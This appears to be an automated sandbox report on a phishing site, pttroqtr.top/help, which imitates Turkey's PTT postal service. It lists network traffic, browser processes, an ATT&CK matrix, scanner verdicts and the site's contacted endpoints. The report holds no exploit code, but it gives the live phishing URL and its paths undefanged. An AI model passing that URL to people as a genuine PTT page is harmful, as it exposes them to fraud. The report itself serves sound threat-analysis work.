Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: classification engineClassification label: mal60.phis.win@28/300@29/9
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=1636,i,8772611216806412330,10793707389040936366,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://pttroqtr.top/help"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=1636,i,8772611216806412330,10793707389040936366,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Registry Run Keys / Startup Folder
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
http://pttroqtr.top/help4%VirustotalBrowse
http://pttroqtr.top/help100%SlashNextFraudulent Website type: Phishing & Social Engineering
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
bg.microsoft.map.fastly.net0%VirustotalBrowse
netdna.bootstrapcdn.com0%VirustotalBrowse
www.google.com0%VirustotalBrowse
fp2e7a.wpc.phicdn.net0%VirustotalBrowse
windowsupdatebg.s.llnwi.net1%VirustotalBrowse
www.ptt.gov.tr0%VirustotalBrowse
chatserver.alo-tech.com0%VirustotalBrowse
pttem.alo-tech.com0%VirustotalBrowse
pttroqtr.top5%VirustotalBrowse
SourceDetectionScannerLabelLink
http://fontawesome.io0%URL Reputationsafe
https://stats.g.doubleclick.net/g/collect0%URL Reputationsafe
http://jqueryui.com0%URL Reputationsafe
https://fontawesome.com0%URL Reputationsafe
http://www.opensource.org/licenses/mit-license.php0%URL Reputationsafe
https://cct.google/taggy/agent.js0%URL Reputationsafe
https://chatserver.alo-tech.com/static/assets/bootstrap/css/bootstrap.min.css0%VirustotalBrowse
http://creativecommons.org/licenses/by/3.0/0%VirustotalBrowse
http://opensource.org/licenses/mit-license.html0%VirustotalBrowse
https://www.google.com0%VirustotalBrowse
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.210.172
truefalseunknown
lb-p3.alo-tech.com
35.201.78.44
truefalse
    unknown
    pttroqtr.top
    8.211.203.165
    truefalseunknown
    netdna.bootstrapcdn.com
    104.18.11.207
    truefalseunknown
    chat-server.alo-tech.com
    34.107.233.18
    truefalse
      unknown
      www.google.com
      142.250.185.132
      truefalseunknown
      fp2e7a.wpc.phicdn.net
      192.229.221.95
      truefalseunknown
      www.ptt.gov.tr
      185.220.152.26
      truefalseunknown
      windowsupdatebg.s.llnwi.net
      87.248.205.0
      truefalseunknown
      chatserver.alo-tech.com
      unknown
      unknownfalseunknown
      pttem.alo-tech.com
      unknown
      unknownfalseunknown
      service-edge.alo-tech.com
      unknown
      unknownfalse
        unknown
        NameMaliciousAntivirus DetectionReputation
        https://www.ptt.gov.tr/_next/static/chunks/5698-10f078fe5b68f680.jsfalse
          unknown
          https://www.ptt.gov.tr/_next/static/chunks/pages/_error-32d9baaae5c99c79.jsfalse
            unknown
            https://www.ptt.gov.tr/_next/static/3nPo4dxLHf5a0RshtsAsa/_middlewareManifest.jsfalse
              unknown
              https://pttroqtr.top/socket.io/?EIO=4&transport=polling&t=P8sjeFl&sid=ZtwaiGyEO0D_jrEhAEf6false
                unknown
                https://pttroqtr.top/help/layout/images/53.pngfalse
                  unknown
                  https://pttroqtr.top/socket.io/?EIO=4&transport=polling&t=P8sjcVq&sid=H_Y22m0FJjANkstPAEf3false
                    unknown
                    https://pttroqtr.top/help/assets/f18e42bakFGym.wofffalse
                      unknown
                      https://pttroqtr.top/socket.io/?EIO=4&transport=polling&t=P8sjcG1&sid=H_Y22m0FJjANkstPAEf3false
                        unknown
                        https://chatserver.alo-tech.com/static/assets/js/ua-parser.min.jsfalse
                          unknown
                          https://pttroqtr.top/help/layout/images/45.pngfalse
                            unknown
                            https://chatserver.alo-tech.com/static/assets/bootstrap/css/bootstrap.min.cssfalseunknown
                            https://pttem.alo-tech.com/storage/media?gcs_file_name=chat/chat_icons/3af51a49-058b-4e67-9af9-1575813efeeb.png&chat_icon=truefalse
                              unknown
                              https://www.ptt.gov.tr/Sayfalar/Kargo/AmbalajHizmetleri.aspxfalse
                                unknown
                                https://pttroqtr.top/help/assets/c16a2af0JxKnW.jsfalse
                                  unknown
                                  https://pttroqtr.top/socket.io/?EIO=4&transport=polling&t=P8sjcF_&sid=H_Y22m0FJjANkstPAEf3false
                                    unknown
                                    https://pttroqtr.top/socket.io/?EIO=4&transport=polling&t=P8sjcVA&sid=H_Y22m0FJjANkstPAEf3false
                                      unknown
                                      https://www.ptt.gov.tr/_next/static/media/OmnesRegular.2b095194.otffalse
                                        unknown
                                        https://chatserver.alo-tech.com/static/assets/js/owl.carousel.min.jsfalse
                                          unknown
                                          https://www.ptt.gov.tr/_next/static/chunks/pages/index-81bebd65698c8415.jsfalse
                                            unknown
                                            https://www.ptt.gov.tr/favicon.icofalse
                                              unknown
                                              https://pttroqtr.top/socket.io/?EIO=4&transport=websocket&sid=H_Y22m0FJjANkstPAEf3false
                                                unknown
                                                https://pttroqtr.top/help/layout/images/37.pngfalse
                                                  unknown
                                                  https://www.ptt.gov.tr/Sayfalar/Kargo/PttYurtIciKargoHizmetleri.aspxfalse
                                                    unknown
                                                    https://pttroqtr.top/socket.io/?EIO=4&transport=websocket&sid=ZtwaiGyEO0D_jrEhAEf6false
                                                      unknown
                                                      https://pttroqtr.top/api/MC42NDcxMDI1MjYyOTk4MDM0false
                                                        unknown
                                                        https://chatserver.alo-tech.com/static/assets/img/microphone_open.svgfalse
                                                          unknown
                                                          https://pttroqtr.top/socket.io/?EIO=4&transport=polling&t=P8sjfG8&sid=DijwWc-tALPoXXo3AEf9false
                                                            unknown
                                                            https://pttroqtr.top/socket.io/?EIO=4&transport=websocket&sid=DijwWc-tALPoXXo3AEf9false
                                                              unknown
                                                              https://www.ptt.gov.tr/_next/static/chunks/pages/doviz-kurlari-5a26b114db728c07.jsfalse
                                                                unknown
                                                                https://www.ptt.gov.tr/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Ffooter-logo.568f7be2.png&w=1080&q=75false
                                                                  unknown
                                                                  https://pttroqtr.top/socket.io/?EIO=4&transport=polling&t=P8sjawy&sid=xZsOXWwlpa9sZhJdAEf0false
                                                                    unknown
                                                                    https://www.ptt.gov.tr/_next/static/css/21ec1dd6e7fd01ba.cssfalse
                                                                      unknown
                                                                      https://www.ptt.gov.tr/_next/static/3nPo4dxLHf5a0RshtsAsa/_ssgManifest.jsfalse
                                                                        unknown
                                                                        https://pttroqtr.top/socket.io/?EIO=4&transport=polling&t=P8sjg1Sfalse
                                                                          unknown
                                                                          https://pttroqtr.top/helpfalse
                                                                            unknown
                                                                            https://pttroqtr.top/socket.io/?EIO=4&transport=polling&t=P8sjjxxfalse
                                                                              unknown
                                                                              https://www.ptt.gov.tr/_next/static/css/81d8b40497d071a4.cssfalse
                                                                                unknown
                                                                                https://pttroqtr.top/help/layout/images/43.pngfalse
                                                                                  unknown
                                                                                  https://chatserver.alo-tech.com/static/assets/js/jquery-2.0.3.min.jsfalse
                                                                                    unknown
                                                                                    https://chatserver.alo-tech.com/static/assets/bootstrap/js/bootstrap.min.jsfalse
                                                                                      unknown
                                                                                      https://pttroqtr.top/socket.io/?EIO=4&transport=polling&t=P8sji3E&sid=PAIOn2iXLFZsVKTaAEgAfalse
                                                                                        unknown
                                                                                        https://pttroqtr.top/help/assets/77985128JxKnW.jsfalse
                                                                                          unknown
                                                                                          https://pttroqtr.top/help/assets/c27b6911JxKnW.jsfalse
                                                                                            unknown
                                                                                            https://pttroqtr.top/socket.io/?EIO=4&transport=polling&t=P8sjjZg&sid=r_NtitDKgtItMN5FAEgDfalse
                                                                                              unknown
                                                                                              https://pttem.alo-tech.com/chat/alochat.js?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29tfalse
                                                                                                unknown
                                                                                                https://www.ptt.gov.tr/_next/static/chunks/4110-03c15b7eaf980721.jsfalse
                                                                                                  unknown
                                                                                                  https://pttroqtr.top/favicon.icofalse
                                                                                                    unknown
                                                                                                    https://pttroqtr.top/help/assets/2dd339f2kFGym.cssfalse
                                                                                                      unknown
                                                                                                      https://pttroqtr.top/help/layout/images/39.pngfalse
                                                                                                        unknown
                                                                                                        https://www.ptt.gov.tr/_next/static/chunks/framework-0438cefc59f69f60.jsfalse
                                                                                                          unknown
                                                                                                          https://pttroqtr.top/socket.io/?EIO=4&transport=polling&t=P8sjhL-&sid=PAIOn2iXLFZsVKTaAEgAfalse
                                                                                                            unknown
                                                                                                            https://pttroqtr.top/socket.io/?EIO=4&transport=polling&t=P8sjc6Pfalse
                                                                                                              unknown
                                                                                                              https://chatserver.alo-tech.com/static/assets/img/microphone_close.svgfalse
                                                                                                                unknown
                                                                                                                https://chatserver.alo-tech.com/static/assets/css/google_fonts.cssfalse
                                                                                                                  unknown
                                                                                                                  https://pttroqtr.top/socket.io/?EIO=4&transport=polling&t=P8sjih1&sid=r_NtitDKgtItMN5FAEgDfalse
                                                                                                                    unknown
                                                                                                                    https://pttroqtr.top/api/MC40NjgzNzc3MjY1OTI2NzY3NA==false
                                                                                                                      unknown
                                                                                                                      https://chatserver.alo-tech.com/static/assets/img/down_button.svgfalse
                                                                                                                        unknown
                                                                                                                        https://pttroqtr.top/socket.io/?EIO=4&transport=polling&t=P8sjh46&sid=PAIOn2iXLFZsVKTaAEgAfalse
                                                                                                                          unknown
                                                                                                                          https://pttroqtr.top/socket.io/?EIO=4&transport=polling&t=P8sjigq&sid=r_NtitDKgtItMN5FAEgDfalse
                                                                                                                            unknown
                                                                                                                            https://www.ptt.gov.tr/_next/static/media/fa-solid-900.ce4938a3.woff2false
                                                                                                                              unknown
                                                                                                                              https://chatserver.alo-tech.com/static/assets/css/page_spa.cssfalse
                                                                                                                                unknown
                                                                                                                                https://pttroqtr.top/help/layout/images/41.pngfalse
                                                                                                                                  unknown
                                                                                                                                  https://pttroqtr.top/help/layout/images/33.pngfalse
                                                                                                                                    unknown
                                                                                                                                    https://pttroqtr.top/socket.io/?EIO=4&transport=polling&t=P8sjdTo&sid=ZtwaiGyEO0D_jrEhAEf6false
                                                                                                                                      unknown
                                                                                                                                      https://www.ptt.gov.tr/_next/static/css/386d6f9094f2dfbc.cssfalse
                                                                                                                                        unknown
                                                                                                                                        https://chatserver.alo-tech.com/static/assets/js/linkify.min.jsfalse
                                                                                                                                          unknown
                                                                                                                                          http://pttroqtr.top/helptrue
                                                                                                                                            unknown
                                                                                                                                            https://pttroqtr.top/socket.io/?EIO=4&transport=polling&t=P8sjgdd&sid=PAIOn2iXLFZsVKTaAEgAfalse
                                                                                                                                              unknown
                                                                                                                                              https://pttroqtr.top/api/MC45ODQ1NjY2NzE5MzU4MDAyfalse
                                                                                                                                                unknown
